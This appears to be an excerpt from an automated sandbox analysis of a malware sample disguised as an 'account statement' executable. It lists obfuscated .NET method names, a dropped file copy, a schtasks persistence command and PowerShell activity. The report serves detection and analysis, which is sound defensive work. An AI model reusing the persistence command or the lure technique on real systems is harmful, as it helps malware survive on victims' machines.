                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, fx1x6XkTFKYRc4eMtM.csHigh entropy of concatenated method names: 'tu6dQKKRJ8', 'iFXdS4G1N1', 'HSod1fDuDj', 'vvkd0J15nH', 'eEkdtorRPL', 'B1ndC2ZUap', 'eVTAmoTbuceFLwfp9k', 'EP1cPMVxG4ouBRJqQr', 'NoLddbb0nY', 'paRdZPMMqc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.csHigh entropy of concatenated method names: 'OHCZEoGYXS', 'za6ZRUp1NC', 'LsfZfihH1x', 'PmqZeCABxg', 'fZBZnFtRZu', 'KgrZT24DKc', 'pdoZQDbKqR', 'HaiZSDAeXH', 'rtCZP9aj4v', 'se1Z14RjhC'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, fPL71nm2ZUapu9jmZJ.csHigh entropy of concatenated method names: 'ibhTE7WPuU', 'ayaTf2Vb8l', 'utZTn2rtoy', 'C1hTQ5Q3o8', 'kfiTSM9SbK', 'Hrinllo2QW', 'twYnHSf6EQ', 'vgmnN3BD0A', 'YaTnvVftcJ', 'FGRn35nXKu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, YM2o09BF5gx5L68j9x.csHigh entropy of concatenated method names: 'Puyr1SEOgw', 'jAWr0KQonX', 'ToString', 'GWmrRgEXER', 'mNZrfxJ7SI', 'QYlreBDUKc', 'mxxrnITVgY', 'rPPrTjJ5XC', 'thArQwQQ0J', 'eiVrSx1TM5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, KYivPAvbBoJxPUPiA2.csHigh entropy of concatenated method names: 'ChcAR844sb', 'AqdAf7XApc', 'RMpAeoWPSD', 'fWxAnQoZrk', 'xOGAThLATv', 'HwbAQ8VVH2', 'cxIASGDdpG', 'TiJAPTrgTP', 'kkLA1FCnqZ', 'h4eA0ohWfu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, xKKRJ8VTFX4G1N1xGX.csHigh entropy of concatenated method names: 'D3dfiKS5Sp', 'rMefcvvbZK', 'SpffU7HpJA', 'Y3nfB1h5XH', 'NYFflbvhV9', 'DYCfHO444e', 'Ro7fNWUTix', 'B7nfvBrXKx', 'PPSf3hYOWA', 'SjmfJ9OJLq'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, ejlP3Oxj5VTYEvKO5r.csHigh entropy of concatenated method names: 'tZHDsgf5V', 'TqHL6fWn1', 'n4r5VkwwE', 'lcMunrfq2', 'RVYWKd0XW', 'lBY9qKXYe', 'Fx4iZHZBZDR5q6wj5U', 'hTgejTfqLGN7KQHyDI', 'MMDA6kDcf', 'DYEjtPCgx'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, TmNAWqstqFSpLbNpTE.csHigh entropy of concatenated method names: 'pyQQRlBiSp', 'E0vQe21bOq', 'McCQTqJuBH', 'yINTJekOsy', 'vY5TzynDHT', 'zAXQgYfYec', 'LR2QdtQDri', 'w0fQxrxcPL', 'mdVQZ4CeYY', 'xkXQkqk348'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, mFN8l0JlMCpR0cYUUm.csHigh entropy of concatenated method names: 'j0YbdHxUEM', 'yLAbZuoTT0', 'CmEbkWkI0T', 'VRqbRdmdvV', 'JjnbfoL9XJ', 'CW1bng2scv', 'DYFbTRNnyh', 'EpWANXpBum', 'MbQAvxSBmE', 'DPWA3vI2hG'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, kR0DFf3CmMYrZsqb6N.csHigh entropy of concatenated method names: 'PsbAmTPdsH', 'UL4AI1KolP', 'zZFAMYgyW4', 'Un6AhXQrVl', 'YZfAicwbo0', 'MkBAOySJCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, mHKiENejJDcn6AxJbF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CMfx300hPc', 'nkTxJ5PJPg', 'ogsxz1YYcH', 'b1BZgjYLca', 'GFCZdvwC4f', 'C9EZx9j4Aj', 'JcAZZ1cK44', 'qgRnKrpWhesTAI9XFDB'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, yUquE6UMuMSijVwDGu.csHigh entropy of concatenated method names: 'ToString', 'wjeCp9TOsm', 'elwCIZR1jG', 'XLrCM6Or2t', 'B52ChAV4fs', 'Hc7COidv4y', 'r2mCqbdbRk', 'jrwCslyeRR', 'J30Co2JPTW', 'XT5C29RNwW'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, RgfDrXHKnC8jGFqB26.csHigh entropy of concatenated method names: 'UIirv4wQPb', 'W3JrJPpmbb', 'apDAg4jARg', 'rt9AdpI2cx', 'uOFrpJ8Ou2', 'UmZraxJtnF', 'jNqrF5QNWn', 'CVBriPBh2v', 'sQWrcW8ea3', 'VtorU1OQPw'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, T82yWMWSofDuDjyvkJ.csHigh entropy of concatenated method names: 'cH3eLV49E6', 'vTte5vCLHs', 'oYveVjVGRW', 'GTWeWhVeBq', 'hb4etnE68T', 'JZfeCR7GNq', 'g2nerLuvOO', 'bSyeAkjplI', 'RiiebyLH3g', 'yv2ejuWm7c'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, f9UIpU26JvmBTBSctL.csHigh entropy of concatenated method names: 'vfHQYG4MDd', 'lxLQ80Eh3u', 'QJwQDjcDQV', 'RsSQLbiuv5', 'XTdQ7qxngP', 'JvcQ5uSdXS', 'aL5QucoJJX', 'RgDQVmDUTR', 'aucQWNTHuO', 'qASQ96w7M7'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, G4wV8Gf6v2K5jjGjCT.csHigh entropy of concatenated method names: 'Dispose', 'EHid3gFA4w', 'JonxInLaGY', 'MbkXXgYQPF', 'fqYdJivPAb', 'ToJdzxPUPi', 'ProcessDialogKey', 'r2SxgR0DFf', 'pmMxdYrZsq', 'r6Nxx0FN8l'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, TeEwg8iN7vW6LLxRRW.csHigh entropy of concatenated method names: 'hOqt4bLcLD', 'qRutaW7Rmk', 'JvOtiQ1wuX', 'DcZtcWNJdC', 'fnmtIY1ulX', 'xZTtMtD2ll', 'WuCthA6ndI', 'CuCtOQdDiY', 'aRHtqNsKQm', 'zZBtsruW67'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, KVbeayhXmtlCZ27r6N.csHigh entropy of concatenated method names: 'i3FT6EgOZd', 'L0fTYU60io', 'O7ETDqlVyd', 'Yq1TLMDMZA', 'y5HT5YVhCu', 'VlKTu3RKje', 'H9lTWInGs8', 'DR2T9rw2JC', 'v12g6V4xk1vhjN1Ug52', 'bKrGdL4boFxp9Sou1KN'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, UXUW0udg70mIAfO19dm.csHigh entropy of concatenated method names: 'hGObYYROs1', 'w5bb8LoxpS', 'reKbDoRtHP', 'gyhbL0KaHv', 'YGtb7gommS', 'l6Qb5qGElQ', 'oXKbu0b469', 'GTbbVHLNMa', 'oT5bWslBUD', 'yV5b98lPrs'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, XUlWngz4TlbqdVkh6V.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XvLbwHlMxj', 'JO9bt0hiNZ', 'FmsbCP8562', 'iIVbr355kJ', 'vUtbAHuBDF', 'KGZbbnZ1TS', 'bH7bj41635'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, nPiq9cdZ7nsxoOEVMFR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VfjjipJ5jB', 'ecNjcBEFjE', 'hMsjU0XmWl', 'mc7jBjno3X', 'hDEjlyeiyp', 'EXSjHKyttM', 'QRPjNo9sHc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, ktPfB7FoodvjaClP45.csHigh entropy of concatenated method names: 'GYbwVdBgV0', 'ct9wWhPHWH', 'UCAwmZr14q', 'oW7wI1myv2', 'gPwwh8v6VZ', 'iw6wOWQEhP', 'uqvwsXyeS1', 'hgYwohn3BM', 'PhGw4Z3TXV', 'kPfwpbsgF5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, fx1x6XkTFKYRc4eMtM.csHigh entropy of concatenated method names: 'tu6dQKKRJ8', 'iFXdS4G1N1', 'HSod1fDuDj', 'vvkd0J15nH', 'eEkdtorRPL', 'B1ndC2ZUap', 'eVTAmoTbuceFLwfp9k', 'EP1cPMVxG4ouBRJqQr', 'NoLddbb0nY', 'paRdZPMMqc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.csHigh entropy of concatenated method names: 'OHCZEoGYXS', 'za6ZRUp1NC', 'LsfZfihH1x', 'PmqZeCABxg', 'fZBZnFtRZu', 'KgrZT24DKc', 'pdoZQDbKqR', 'HaiZSDAeXH', 'rtCZP9aj4v', 'se1Z14RjhC'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, fPL71nm2ZUapu9jmZJ.csHigh entropy of concatenated method names: 'ibhTE7WPuU', 'ayaTf2Vb8l', 'utZTn2rtoy', 'C1hTQ5Q3o8', 'kfiTSM9SbK', 'Hrinllo2QW', 'twYnHSf6EQ', 'vgmnN3BD0A', 'YaTnvVftcJ', 'FGRn35nXKu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, YM2o09BF5gx5L68j9x.csHigh entropy of concatenated method names: 'Puyr1SEOgw', 'jAWr0KQonX', 'ToString', 'GWmrRgEXER', 'mNZrfxJ7SI', 'QYlreBDUKc', 'mxxrnITVgY', 'rPPrTjJ5XC', 'thArQwQQ0J', 'eiVrSx1TM5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, KYivPAvbBoJxPUPiA2.csHigh entropy of concatenated method names: 'ChcAR844sb', 'AqdAf7XApc', 'RMpAeoWPSD', 'fWxAnQoZrk', 'xOGAThLATv', 'HwbAQ8VVH2', 'cxIASGDdpG', 'TiJAPTrgTP', 'kkLA1FCnqZ', 'h4eA0ohWfu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, xKKRJ8VTFX4G1N1xGX.csHigh entropy of concatenated method names: 'D3dfiKS5Sp', 'rMefcvvbZK', 'SpffU7HpJA', 'Y3nfB1h5XH', 'NYFflbvhV9', 'DYCfHO444e', 'Ro7fNWUTix', 'B7nfvBrXKx', 'PPSf3hYOWA', 'SjmfJ9OJLq'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, ejlP3Oxj5VTYEvKO5r.csHigh entropy of concatenated method names: 'tZHDsgf5V', 'TqHL6fWn1', 'n4r5VkwwE', 'lcMunrfq2', 'RVYWKd0XW', 'lBY9qKXYe', 'Fx4iZHZBZDR5q6wj5U', 'hTgejTfqLGN7KQHyDI', 'MMDA6kDcf', 'DYEjtPCgx'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, TmNAWqstqFSpLbNpTE.csHigh entropy of concatenated method names: 'pyQQRlBiSp', 'E0vQe21bOq', 'McCQTqJuBH', 'yINTJekOsy', 'vY5TzynDHT', 'zAXQgYfYec', 'LR2QdtQDri', 'w0fQxrxcPL', 'mdVQZ4CeYY', 'xkXQkqk348'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, mFN8l0JlMCpR0cYUUm.csHigh entropy of concatenated method names: 'j0YbdHxUEM', 'yLAbZuoTT0', 'CmEbkWkI0T', 'VRqbRdmdvV', 'JjnbfoL9XJ', 'CW1bng2scv', 'DYFbTRNnyh', 'EpWANXpBum', 'MbQAvxSBmE', 'DPWA3vI2hG'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, kR0DFf3CmMYrZsqb6N.csHigh entropy of concatenated method names: 'PsbAmTPdsH', 'UL4AI1KolP', 'zZFAMYgyW4', 'Un6AhXQrVl', 'YZfAicwbo0', 'MkBAOySJCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, mHKiENejJDcn6AxJbF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CMfx300hPc', 'nkTxJ5PJPg', 'ogsxz1YYcH', 'b1BZgjYLca', 'GFCZdvwC4f', 'C9EZx9j4Aj', 'JcAZZ1cK44', 'qgRnKrpWhesTAI9XFDB'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, yUquE6UMuMSijVwDGu.csHigh entropy of concatenated method names: 'ToString', 'wjeCp9TOsm', 'elwCIZR1jG', 'XLrCM6Or2t', 'B52ChAV4fs', 'Hc7COidv4y', 'r2mCqbdbRk', 'jrwCslyeRR', 'J30Co2JPTW', 'XT5C29RNwW'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, RgfDrXHKnC8jGFqB26.csHigh entropy of concatenated method names: 'UIirv4wQPb', 'W3JrJPpmbb', 'apDAg4jARg', 'rt9AdpI2cx', 'uOFrpJ8Ou2', 'UmZraxJtnF', 'jNqrF5QNWn', 'CVBriPBh2v', 'sQWrcW8ea3', 'VtorU1OQPw'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, T82yWMWSofDuDjyvkJ.csHigh entropy of concatenated method names: 'cH3eLV49E6', 'vTte5vCLHs', 'oYveVjVGRW', 'GTWeWhVeBq', 'hb4etnE68T', 'JZfeCR7GNq', 'g2nerLuvOO', 'bSyeAkjplI', 'RiiebyLH3g', 'yv2ejuWm7c'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, f9UIpU26JvmBTBSctL.csHigh entropy of concatenated method names: 'vfHQYG4MDd', 'lxLQ80Eh3u', 'QJwQDjcDQV', 'RsSQLbiuv5', 'XTdQ7qxngP', 'JvcQ5uSdXS', 'aL5QucoJJX', 'RgDQVmDUTR', 'aucQWNTHuO', 'qASQ96w7M7'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, G4wV8Gf6v2K5jjGjCT.csHigh entropy of concatenated method names: 'Dispose', 'EHid3gFA4w', 'JonxInLaGY', 'MbkXXgYQPF', 'fqYdJivPAb', 'ToJdzxPUPi', 'ProcessDialogKey', 'r2SxgR0DFf', 'pmMxdYrZsq', 'r6Nxx0FN8l'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, TeEwg8iN7vW6LLxRRW.csHigh entropy of concatenated method names: 'hOqt4bLcLD', 'qRutaW7Rmk', 'JvOtiQ1wuX', 'DcZtcWNJdC', 'fnmtIY1ulX', 'xZTtMtD2ll', 'WuCthA6ndI', 'CuCtOQdDiY', 'aRHtqNsKQm', 'zZBtsruW67'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, KVbeayhXmtlCZ27r6N.csHigh entropy of concatenated method names: 'i3FT6EgOZd', 'L0fTYU60io', 'O7ETDqlVyd', 'Yq1TLMDMZA', 'y5HT5YVhCu', 'VlKTu3RKje', 'H9lTWInGs8', 'DR2T9rw2JC', 'v12g6V4xk1vhjN1Ug52', 'bKrGdL4boFxp9Sou1KN'
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile created: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
